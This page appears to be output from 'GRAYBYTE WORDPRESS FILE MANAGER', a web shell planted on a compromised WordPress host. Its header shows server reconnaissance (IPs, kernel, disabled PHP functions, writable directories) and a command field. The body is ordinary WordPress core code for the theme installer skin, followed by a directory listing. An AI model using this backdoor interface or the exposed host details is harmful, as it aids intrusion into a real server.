GRAYBYTE WORDPRESS FILE MANAGER2898

Server IP : 149.255.58.128 / Your IP : 216.73.216.30
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/public_html/wp-admin/includes/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/public_html/wp-admin/includes//class-theme-installer-skin.php
<?php
/**
 * Upgrader API: Theme_Installer_Skin class
 *
 * @package WordPress
 * @subpackage Upgrader
 * @since 4.6.0
 */

/**
 * Theme Installer Skin for the WordPress Theme Installer.
 *
 * @since 2.8.0
 * @since 4.6.0 Moved to its own file from wp-admin/includes/class-wp-upgrader-skins.php.
 *
 * @see WP_Upgrader_Skin
 */
class Theme_Installer_Skin extends WP_Upgrader_Skin {
	public $api;
	public $type;
	public $url;
	public $overwrite;

	private $is_downgrading = false;

	/**
	 * @param array $args
	 */
	public function __construct( $args = array() ) {
		$defaults = array(
			'type'      => 'web',
			'url'       => '',
			'theme'     => '',
			'nonce'     => '',
			'title'     => '',
			'overwrite' => '',
		);
		$args     = wp_parse_args( $args, $defaults );

		$this->type      = $args['type'];
		$this->url       = $args['url'];
		$this->api       = isset( $args['api'] ) ? $args['api'] : array();
		$this->overwrite = $args['overwrite'];

		parent::__construct( $args );
	}

	/**
	 * Performs an action before installing a theme.
	 *
	 * @since 2.8.0
	 */
	public function before() {
		if ( ! empty( $this->api ) ) {
			$this->upgrader->strings['process_success'] = sprintf(
				$this->upgrader->strings['process_success_specific'],
				$this->api->name,
				$this->api->version
			);
		}
	}

	/**
	 * Hides the `process_failed` error when updating a theme by uploading a zip file.
	 *
	 * @since 5.5.0
	 *
	 * @param WP_Error $wp_error WP_Error object.
	 * @return bool True if the error should be hidden, false otherwise.
	 */
	public function hide_process_failed( $wp_error ) {
		if (
			'upload' === $this->type &&
			'' === $this->overwrite &&
			$wp_error->get_error_code() === 'folder_exists'
		) {
			return true;
		}

		return false;
	}

	/**
	 * Performs an action following a single theme install.
	 *
	 * @since 2.8.0
	 */
	public function after() {
		if ( $this->do_overwrite() ) {
			return;
		}

		if ( empty( $this->upgrader->result['destination_name'] ) ) {
			return;
		}

		$theme_info = $this->upgrader->theme_info();
		if ( empty( $theme_info ) ) {
			return;
		}

		$name       = $theme_info->display( 'Name' );
		$stylesheet = $this->upgrader->result['destination_name'];
		$template   = $theme_info->get_template();

		$activate_link = add_query_arg(
			array(
				'action'     => 'activate',
				'template'   => urlencode( $template ),
				'stylesheet' => urlencode( $stylesheet ),
			),
			admin_url( 'themes.php' )
		);
		$activate_link = wp_nonce_url( $activate_link, 'switch-theme_' . $stylesheet );

		$install_actions = array();

		if ( current_user_can( 'edit_theme_options' ) && current_user_can( 'customize' ) && ! $theme_info->is_block_theme() ) {
			$customize_url = add_query_arg(
				array(
					'theme'  => urlencode( $stylesheet ),
					'return' => urlencode( admin_url( 'web' === $this->type ? 'theme-install.php' : 'themes.php' ) ),
				),
				admin_url( 'customize.php' )
			);

			$install_actions['preview'] = sprintf(
				'<a href="%s" class="hide-if-no-customize load-customize">' .
				'<span aria-hidden="true">%s</span><span class="screen-reader-text">%s</span></a>',
				esc_url( $customize_url ),
				__( 'Live Preview' ),
				/* translators: Hidden accessibility text. %s: Theme name. */
				sprintf( __( 'Live Preview &#8220;%s&#8221;' ), $name )
			);
		}

		$install_actions['activate'] = sprintf(
			'<a href="%s" class="activatelink">' .
			'<span aria-hidden="true">%s</span><span class="screen-reader-text">%s</span></a>',
			esc_url( $activate_link ),
			__( 'Activate' ),
			/* translators: Hidden accessibility text. %s: Theme name. */
			sprintf( _x( 'Activate &#8220;%s&#8221;', 'theme' ), $name )
		);

		if ( is_network_admin() && current_user_can( 'manage_network_themes' ) ) {
			$install_actions['network_enable'] = sprintf(
				'<a href="%s" target="_parent">%s</a>',
				esc_url( wp_nonce_url( 'themes.php?action=enable&amp;theme=' . urlencode( $stylesheet ), 'enable-theme_' . $stylesheet ) ),
				__( 'Network Enable' )
			);
		}

		if ( 'web' === $this->type ) {
			$install_actions['themes_page'] = sprintf(
				'<a href="%s" target="_parent">%s</a>',
				self_admin_url( 'theme-install.php' ),
				__( 'Go to Theme Installer' )
			);
		} elseif ( current_user_can( 'switch_themes' ) || current_user_can( 'edit_theme_options' ) ) {
			$install_actions['themes_page'] = sprintf(
				'<a href="%s" target="_parent">%s</a>',
				self_admin_url( 'themes.php' ),
				__( 'Go to Themes page' )
			);
		}

		if ( ! $this->result || is_wp_error( $this->result ) || is_network_admin() || ! current_user_can( 'switch_themes' ) ) {
			unset( $install_actions['activate'], $install_actions['preview'] );
		} elseif ( get_option( 'template' ) === $stylesheet ) {
			unset( $install_actions['activate'] );
		}

		/**
		 * Filters the list of action links available following a single theme installation.
		 *
		 * @since 2.8.0
		 *
		 * @param string[] $install_actions Array of theme action links.
		 * @param object   $api             Object containing WordPress.org API theme data.
		 * @param string   $stylesheet      Theme directory name.
		 * @param WP_Theme $theme_info      Theme object.
		 */
		$install_actions = apply_filters( 'install_theme_complete_actions', $install_actions, $this->api, $stylesheet, $theme_info );
		if ( ! empty( $install_actions ) ) {
			$this->feedback( implode( ' | ', (array) $install_actions ) );
		}
	}

	/**
	 * Checks if the theme can be overwritten and outputs the HTML for overwriting a theme on upload.
	 *
	 * @since 5.5.0
	 *
	 * @return bool Whether the theme can be overwritten and HTML was outputted.
	 */
	private function do_overwrite() {
		if ( 'upload' !== $this->type || ! is_wp_error( $this->result ) || 'folder_exists' !== $this->result->get_error_code() ) {
			return false;
		}

		$folder = $this->result->get_error_data( 'folder_exists' );
		$folder = rtrim( $folder, '/' );

		$current_theme_data = false;
		$all_themes         = wp_get_themes( array( 'errors' => null ) );

		foreach ( $all_themes as $theme ) {
			$stylesheet_dir = wp_normalize_path( $theme->get_stylesheet_directory() );

			if ( rtrim( $stylesheet_dir, '/' ) !== $folder ) {
				continue;
			}

			$current_theme_data = $theme;
		}

		$new_theme_data = $this->upgrader->new_theme_data;

		if ( ! $current_theme_data || ! $new_theme_data ) {
			return false;
		}

		echo '<h2 class="update-from-upload-heading">' . esc_html__( 'This theme is already installed.' ) . '</h2>';

		// Check errors for active theme.
		if ( is_wp_error( $current_theme_data->errors() ) ) {
			$this->feedback( 'current_theme_has_errors', $current_theme_data->errors()->get_error_message() );
		}

		$this->is_downgrading = version_compare( $current_theme_data['Version'], $new_theme_data['Version'], '>' );

		$is_invalid_parent = false;
		if ( ! empty( $new_theme_data['Template'] ) ) {
			$is_invalid_parent = ! in_array( $new_theme_data['Template'], array_keys( $all_themes ), true );
		}

		$rows = array(
			'Name'        => __( 'Theme name' ),
			'Version'     => __( 'Version' ),
			'Author'      => __( 'Author' ),
			'RequiresWP'  => __( 'Required WordPress version' ),
			'RequiresPHP' => __( 'Required PHP version' ),
			'Template'    => __( 'Parent theme' ),
		);

		$table  = '<table class="update-from-upload-comparison"><tbody>';
		$table .= '<tr><th></th><th>' . esc_html_x( 'Active', 'theme' ) . '</th><th>' . esc_html_x( 'Uploaded', 'theme' ) . '</th></tr>';

		$is_same_theme = true; // Let's consider only these rows.

		foreach ( $rows as $field => $label ) {
			$old_value = $current_theme_data->display( $field, false );
			$old_value = $old_value ? (string) $old_value : '-';

			$new_value = ! empty( $new_theme_data[ $field ] ) ? (string) $new_theme_data[ $field ] : '-';

			if ( $old_value === $new_value && '-' === $new_value && 'Template' === $field ) {
				continue;
			}

			$is_same_theme = $is_same_theme && ( $old_value === $new_value );

			$diff_field     = ( 'Version' !== $field && $new_value !== $old_value );
			$diff_version   = ( 'Version' === $field && $this->is_downgrading );
			$invalid_parent = false;

			if ( 'Template' === $field && $is_invalid_parent ) {
				$invalid_parent = true;
				$new_value     .= ' ' . __( '(not found)' );
			}

			$table .= '<tr><td class="name-label">' . $label . '</td><td>' . wp_strip_all_tags( $old_value ) . '</td>';
			$table .= ( $diff_field || $diff_version || $invalid_parent ) ? '<td class="warning">' : '<td>';
			$table .= wp_strip_all_tags( $new_value ) . '</td></tr>';
		}

		$table .= '</tbody></table>';

		/**
		 * Filters the compare table output for overwriting a theme package on upload.
		 *
		 * @since 5.5.0
		 *
		 * @param string   $table              The output table with Name, Version, Author, RequiresWP, and RequiresPHP info.
		 * @param WP_Theme $current_theme_data Active theme data.
		 * @param array    $new_theme_data     Array with uploaded theme data.
		 */
		echo apply_filters( 'install_theme_overwrite_comparison', $table, $current_theme_data, $new_theme_data );

		$install_actions = array();
		$can_update      = true;

		$blocked_message  = '<p>' . esc_html__( 'The theme cannot be updated due to the following:' ) . '</p>';
		$blocked_message .= '<ul class="ul-disc">';

		$requires_php = isset( $new_theme_data['RequiresPHP'] ) ? $new_theme_data['RequiresPHP'] : null;
		$requires_wp  = isset( $new_theme_data['RequiresWP'] ) ? $new_theme_data['RequiresWP'] : null;

		if ( ! is_php_version_compatible( $requires_php ) ) {
			$error = sprintf(
				/* translators: 1: Current PHP version, 2: Version required by the uploaded theme. */
				__( 'The PHP version on your server is %1$s, however the uploaded theme requires %2$s.' ),
				PHP_VERSION,
				$requires_php
			);

			$blocked_message .= '<li>' . esc_html( $error ) . '</li>';
			$can_update       = false;
		}

		if ( ! is_wp_version_compatible( $requires_wp ) ) {
			$error = sprintf(
				/* translators: 1: Current WordPress version, 2: Version required by the uploaded theme. */
				__( 'Your WordPress version is %1$s, however the uploaded theme requires %2$s.' ),
				get_bloginfo( 'version' ),
				$requires_wp
			);

			$blocked_message .= '<li>' . esc_html( $error ) . '</li>';
			$can_update       = false;
		}

		$blocked_message .= '</ul>';

		if ( $can_update ) {
			if ( $this->is_downgrading ) {
				$warning = sprintf(
					/* translators: %s: Documentation URL. */
					__( 'You are uploading an older version of the active theme. You can continue to install the older version, but be sure to <a href="%s">back up your database and files</a> first.' ),
					__( 'https://wordpress.org/documentation/article/wordpress-backups/' )
				);
			} else {
				$warning = sprintf(
					/* translators: %s: Documentation URL. */
					__( 'You are updating a theme. Be sure to <a href="%s">back up your database and files</a> first.' ),
					__( 'https://wordpress.org/documentation/article/wordpress-backups/' )
				);
			}

			echo '<p class="update-from-upload-notice">' . $warning . '</p>';

			$overwrite = $this->is_downgrading ? 'downgrade-theme' : 'update-theme';

			$install_actions['overwrite_theme'] = sprintf(
				'<a class="button button-primary update-from-upload-overwrite" href="%s" target="_parent">%s</a>',
				wp_nonce_url( add_query_arg( 'overwrite', $overwrite, $this->url ), 'theme-upload' ),
				_x( 'Replace active with uploaded', 'theme' )
			);
		} else {
			echo $blocked_message;
		}

		$cancel_url = add_query_arg( 'action', 'upload-theme-cancel-overwrite', $this->url );

		$install_actions['themes_page'] = sprintf(
			'<a class="button" href="%s" target="_parent">%s</a>',
			wp_nonce_url( $cancel_url, 'theme-upload-cancel-overwrite' ),
			__( 'Cancel and go back' )
		);

		/**
		 * Filters the list of action links available following a single theme installation failure
		 * when overwriting is allowed.
		 *
		 * @since 5.5.0
		 *
		 * @param string[] $install_actions Array of theme action links.
		 * @param object   $api             Object containing WordPress.org API theme data.
		 * @param array    $new_theme_data  Array with uploaded theme data.
		 */
		$install_actions = apply_filters( 'install_theme_overwrite_actions', $install_actions, $this->api, $new_theme_data );

		if ( ! empty( $install_actions ) ) {
			printf(
				'<p class="update-from-upload-expired hidden">%s</p>',
				__( 'The uploaded file has expired. Please go back and upload it again.' )
			);
			echo '<p class="update-from-upload-actions">' . implode( ' ', (array) $install_actions ) . '</p>';
		}

		return true;
	}
}

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 20 2025 03:29:06
1032 / wheelch2
0755
admin-filters.php
7.81 KB
September 25 2023 21:36:34
1032 / wheelch2
0644
admin.php
3.543 KB
July 11 2023 09:33:24
1032 / wheelch2
0644
ajax-actions.php
148.174 KB
October 12 2023 17:17:22
1032 / wheelch2
0644
bookmark.php
11.343 KB
May 03 2023 14:33:22
1032 / wheelch2
0644
class-automatic-upgrader-skin.php
3.577 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
class-bulk-plugin-upgrader-skin.php
2.2 KB
August 29 2022 17:16:10
1032 / wheelch2
0644
class-bulk-theme-upgrader-skin.php
2.271 KB
August 29 2022 17:16:10
1032 / wheelch2
0644
class-bulk-upgrader-skin.php
5.571 KB
September 17 2023 19:53:22
1032 / wheelch2
0644
class-core-upgrader.php
14.654 KB
July 10 2023 00:22:24
1032 / wheelch2
0644
class-custom-background.php
20.931 KB
October 13 2023 16:50:20
1032 / wheelch2
0644
class-custom-image-header.php
47.633 KB
October 13 2023 16:50:20
1032 / wheelch2
0644
class-file-upload-upgrader.php
4.125 KB
January 30 2024 19:57:12
1032 / wheelch2
0644
class-ftp-pure.php
5.299 KB
November 01 2019 20:27:02
1032 / wheelch2
0644
class-ftp-sockets.php
8.28 KB
March 22 2022 21:55:04
1032 / wheelch2
0644
class-ftp.php
26.663 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
class-language-pack-upgrader-skin.php
2.419 KB
September 09 2021 18:29:56
1032 / wheelch2
0644
class-language-pack-upgrader.php
14.601 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
class-pclzip.php
192.08 KB
May 19 2023 17:57:20
1032 / wheelch2
0644
class-plugin-installer-skin.php
11.652 KB
June 14 2023 11:04:28
1032 / wheelch2
0644
class-plugin-upgrader-skin.php
3.201 KB
June 14 2023 11:04:28
1032 / wheelch2
0644
class-plugin-upgrader.php
22.783 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
class-theme-installer-skin.php
12.319 KB
June 14 2023 11:04:28
1032 / wheelch2
0644
class-theme-upgrader-skin.php
4.069 KB
June 14 2023 11:04:28
1032 / wheelch2
0644
class-theme-upgrader.php
24.849 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
class-walker-category-checklist.php
4.783 KB
August 24 2023 13:31:16
1032 / wheelch2
0644
class-walker-nav-menu-checklist.php
5.496 KB
September 08 2023 14:02:24
1032 / wheelch2
0644
class-walker-nav-menu-edit.php
12.938 KB
September 14 2023 17:16:20
1032 / wheelch2
0644
class-wp-ajax-upgrader-skin.php
4.095 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
class-wp-application-passwords-list-table.php
6.779 KB
May 09 2023 03:07:24
1032 / wheelch2
0644
class-wp-automatic-updater.php
51.794 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
class-wp-comments-list-table.php
31.545 KB
October 12 2023 17:08:22
1032 / wheelch2
0644
class-wp-community-events.php
18.329 KB
September 12 2023 19:53:18
1032 / wheelch2
0644
class-wp-debug-data.php
59.014 KB
September 02 2023 23:06:24
1032 / wheelch2
0644
class-wp-filesystem-base.php
23.838 KB
October 11 2023 11:35:26
1032 / wheelch2
0644
class-wp-filesystem-direct.php
17.718 KB
May 04 2023 02:00:20
1032 / wheelch2
0644
class-wp-filesystem-ftpext.php
22.56 KB
May 04 2023 02:00:20
1032 / wheelch2
0644
class-wp-filesystem-ftpsockets.php
18.046 KB
May 04 2023 02:00:20
1032 / wheelch2
0644
class-wp-filesystem-ssh2.php
22.763 KB
June 29 2023 21:35:30
1032 / wheelch2
0644
class-wp-importer.php
7.29 KB
August 14 2023 14:29:20
1032 / wheelch2
0644
class-wp-internal-pointers.php
4.47 KB
June 14 2023 17:27:20
1032 / wheelch2
0644
class-wp-links-list-table.php
8.694 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-list-table-compat.php
1.462 KB
November 14 2020 22:24:08
1032 / wheelch2
0644
class-wp-list-table.php
51.239 KB
October 12 2023 17:08:22
1032 / wheelch2
0644
class-wp-media-list-table.php
24.97 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-ms-sites-list-table.php
21.466 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-ms-themes-list-table.php
27.398 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-ms-users-list-table.php
14.824 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-plugin-install-list-table.php
24.403 KB
September 17 2023 19:53:22
1032 / wheelch2
0644
class-wp-plugins-list-table.php
49.208 KB
October 11 2023 09:03:32
1032 / wheelch2
0644
class-wp-post-comments-list-table.php
1.419 KB
October 04 2022 08:17:16
1032 / wheelch2
0644
class-wp-posts-list-table.php
62.278 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-privacy-data-export-requests-list-table.php
5.433 KB
March 11 2022 00:52:02
1032 / wheelch2
0644
class-wp-privacy-data-removal-requests-list-table.php
5.581 KB
September 08 2023 14:02:24
1032 / wheelch2
0644
class-wp-privacy-policy-content.php
31.774 KB
November 15 2023 23:17:20
1032 / wheelch2
0644
class-wp-privacy-requests-table.php
13.646 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-screen.php
36.421 KB
June 22 2023 19:27:24
1032 / wheelch2
0644
class-wp-site-health-auto-updates.php
13.188 KB
September 26 2023 04:57:12
1032 / wheelch2
0644
class-wp-site-health.php
119.374 KB
September 22 2023 23:38:20
1032 / wheelch2
0644
class-wp-site-icon.php
6.154 KB
April 23 2023 08:32:18
1032 / wheelch2
0644
class-wp-terms-list-table.php
20.63 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
class-wp-theme-install-list-table.php
15.309 KB
June 14 2023 11:04:28
1032 / wheelch2
0644
class-wp-themes-list-table.php
10.038 KB
May 09 2023 03:07:24
1032 / wheelch2
0644
class-wp-upgrader-skin.php
6.394 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
class-wp-upgrader-skins.php
1.442 KB
October 08 2019 21:49:04
1032 / wheelch2
0644
class-wp-upgrader.php
44.135 KB
September 10 2023 12:03:22
1032 / wheelch2
0644
class-wp-users-list-table.php
18.612 KB
September 23 2023 00:28:16
1032 / wheelch2
0644
comment.php
5.978 KB
July 21 2022 02:45:10
1032 / wheelch2
0644
continents-cities.php
20.059 KB
September 20 2022 03:54:12
1032 / wheelch2
0644
credits.php
5.802 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
dashboard.php
68.472 KB
October 12 2023 17:08:22
1032 / wheelch2
0644
deprecated.php
40.795 KB
August 25 2023 08:07:12
1032 / wheelch2
0644
dropdown.php
0 KB
December 16 2023 06:00:19
1032 / wheelch2
0644
edit-tag-messages.php
1.443 KB
December 07 2021 17:50:02
1032 / wheelch2
0644
export.php
23.566 KB
June 19 2023 22:57:28
1032 / wheelch2
0644
file.php
95.065 KB
October 11 2023 11:35:26
1032 / wheelch2
0644
image-edit.php
42.002 KB
September 21 2023 22:34:16
1032 / wheelch2
0644
image.php
37.865 KB
September 29 2023 16:51:24
1032 / wheelch2
0644
import.php
6.52 KB
July 29 2022 13:52:10
1032 / wheelch2
0644
list-table.php
3.713 KB
October 04 2022 08:17:16
1032 / wheelch2
0644
media.php
115.2 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
menu.php
9.372 KB
September 09 2023 13:58:26
1032 / wheelch2
0644
meta-boxes.php
64.496 KB
September 29 2023 21:43:24
1032 / wheelch2
0644
misc.php
44.798 KB
September 21 2023 22:54:16
1032 / wheelch2
0644
ms-admin-filters.php
1.266 KB
September 20 2022 07:21:10
1032 / wheelch2
0644
ms-deprecated.php
3.682 KB
September 20 2022 07:21:10
1032 / wheelch2
0644
ms.php
33.115 KB
September 17 2023 19:53:22
1032 / wheelch2
0644
nav-menu.php
47.724 KB
September 17 2023 19:53:22
1032 / wheelch2
0644
network.php
26.917 KB
September 17 2023 19:53:22
1032 / wheelch2
0644
noop.php
1.121 KB
September 21 2023 05:57:26
1032 / wheelch2
0644
options.php
4.061 KB
July 10 2023 00:37:22
1032 / wheelch2
0644
plugin-install.php
34.565 KB
September 14 2023 05:43:20
1032 / wheelch2
0644
plugin.php
87.768 KB
September 14 2023 05:43:20
1032 / wheelch2
0644
post.php
79.144 KB
November 09 2023 04:55:20
1032 / wheelch2
0644
privacy-tools.php
32.678 KB
June 22 2023 19:06:26
1032 / wheelch2
0644
revision.php
15.768 KB
September 08 2023 14:33:22
1032 / wheelch2
0644
schema.php
41.899 KB
January 30 2024 19:58:26
1032 / wheelch2
0644
screen.php
6.206 KB
May 10 2021 00:57:02
1032 / wheelch2
0644
taxonomy.php
8.227 KB
March 10 2023 12:34:20
1032 / wheelch2
0644
template.php
95.869 KB
November 09 2023 01:40:24
1032 / wheelch2
0644
theme-install.php
6.817 KB
September 08 2023 14:33:22
1032 / wheelch2
0644
theme.php
46.23 KB
October 03 2023 19:48:20
1032 / wheelch2
0644
translation-install.php
8.686 KB
November 29 2022 21:21:14
1032 / wheelch2
0644
update-core.php
70.823 KB
November 15 2023 23:17:20
1032 / wheelch2
0644
update.php
34.828 KB
November 09 2023 01:40:24
1032 / wheelch2
0644
upgrade.php
109.518 KB
September 22 2023 23:38:20
1032 / wheelch2
0644
user.php
22.918 KB
October 12 2023 17:11:18
1032 / wheelch2
0644
widgets.php
10.656 KB
September 09 2023 13:58:26
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF